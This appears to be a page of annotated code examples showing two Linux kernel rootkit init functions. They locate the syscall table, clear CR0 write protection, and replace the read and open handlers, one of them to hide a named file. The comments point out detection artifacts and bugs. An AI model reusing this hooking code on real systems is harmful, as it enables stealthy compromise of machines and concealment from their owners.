示例#1
/*
 * Module init: hooks the read() system call by overwriting its entry in
 * the kernel's syscall table.  This is the textbook syscall-table-hooking
 * pattern; from a defender's view every step below is a detectable event:
 * the write to CR0 with the WP bit cleared, the changed table entry, and
 * the fact that sys_call_table is located at all (the kernel stops exporting
 * it, hence the lookup helper).
 *
 * Returns 0 on success, -1 if the table could not be located.  Note that
 * the kernel convention is a negative errno; -1 is -EPERM, which is a
 * misleading code for "table not found" (-ENODEV or -ENOENT would be usual).
 * aquire_sys_call_table, sys_call_table, original_cr0, ref_sys_read and
 * new_sys_read are defined elsewhere in the module (not visible here).
 */
static int __init rootkit_start(void)
{
    // Find the syscall table in memory.  The helper's name is misspelled
    // ("aquire"); the assignment-in-condition relies on NULL meaning failure.
    if(!(sys_call_table = aquire_sys_call_table()))
        return -1;

    // record the initial value in the cr0 register
    original_cr0 = read_cr0();
    // Clear bit 16 of CR0, i.e. CR0.WP, so the kernel may write to read-only
    // pages (the syscall table lives in one).  Toggling WP this way is a
    // strong rootkit indicator; newer x86 kernels pin CR0.WP and warn on or
    // reject attempts to clear it through write_cr0() — TODO confirm for the
    // target kernel version.
    write_cr0(original_cr0 & ~0x00010000);
    // Save the original handler so the hook can forward to it and so the
    // module can restore the entry on unload (restore code not shown here).
    ref_sys_read = (void *)sys_call_table[__NR_read]; 
    // Overwrite the table entry.  Integrity checkers that compare
    // sys_call_table entries against kallsyms/System.map will flag this.
    sys_call_table[__NR_read] = (unsigned long *)new_sys_read;
    // Restore CR0 exactly as it was read above.  The three steps (unlock,
    // patch, relock) must stay in this order; nothing between them may
    // sleep or be preempted safely, which the code does not guard against.
    write_cr0(original_cr0);

    return 0;
}
示例#2
/*
 * Module init: same syscall-table-hooking pattern as the first example, but
 * it replaces two entries (read and open) and logs each step with printk.
 * Those KERN_INFO lines are a forensic artifact in their own right: the
 * module announces itself, the table unlock, both patched entries and the
 * name of the file it intends to hide in the kernel log.
 *
 * Returns 0 on success, -1 (i.e. -EPERM, not a descriptive errno) when the
 * syscall table cannot be located.  sys_call_table, original_cr0,
 * ref_sys_read, ref_sys_open, new_sys_read, new_sys_open and file_to_hide
 * are defined elsewhere in the module.
 */
static int __init jackle_start( void ) {
    
    printk( KERN_INFO "[+]  J A C K A L\n" );
    // Locate the (unexported) syscall table; NULL means failure.
    if( !( sys_call_table = aquire_sys_call_table() ) )
        return -1;
    // Snapshot CR0 so it can be restored byte-for-byte below.
    original_cr0 = read_cr0();
    printk( KERN_INFO " |- Aquired sys_call_table\n" );

    // Clear CR0.WP (bit 16) to allow writes into read-only kernel pages.
    // Newer x86 kernels pin this bit and may warn on or refuse the write —
    // TODO confirm against the target kernel.
    write_cr0( original_cr0 & ~0x00010000 );
    printk( KERN_INFO " |- Unlocked table!!\n" );

    // Keep the original handlers; both hooks presumably forward to them
    // and the unload path needs them to restore the table (not shown here).
    ref_sys_read = ( void * )sys_call_table[__NR_read];
    ref_sys_open = ( void * )sys_call_table[__NR_open];

    // Overwrite the two entries.  Any syscall-table integrity check
    // (comparison against kallsyms/System.map) will flag both.
    sys_call_table[__NR_read] = ( unsigned long * )new_sys_read;
    printk( KERN_INFO " |- Patched sys_read\n" );
    sys_call_table[__NR_open] = ( unsigned long * )new_sys_open;
    printk( KERN_INFO " |- Patched sys_open\n" );
    printk( KERN_INFO " |  ` hiding %s\n", file_to_hide );
    // Re-enable write protection; the window between the two write_cr0
    // calls is not protected against preemption or interrupts.
    write_cr0( original_cr0 );

    return 0;
}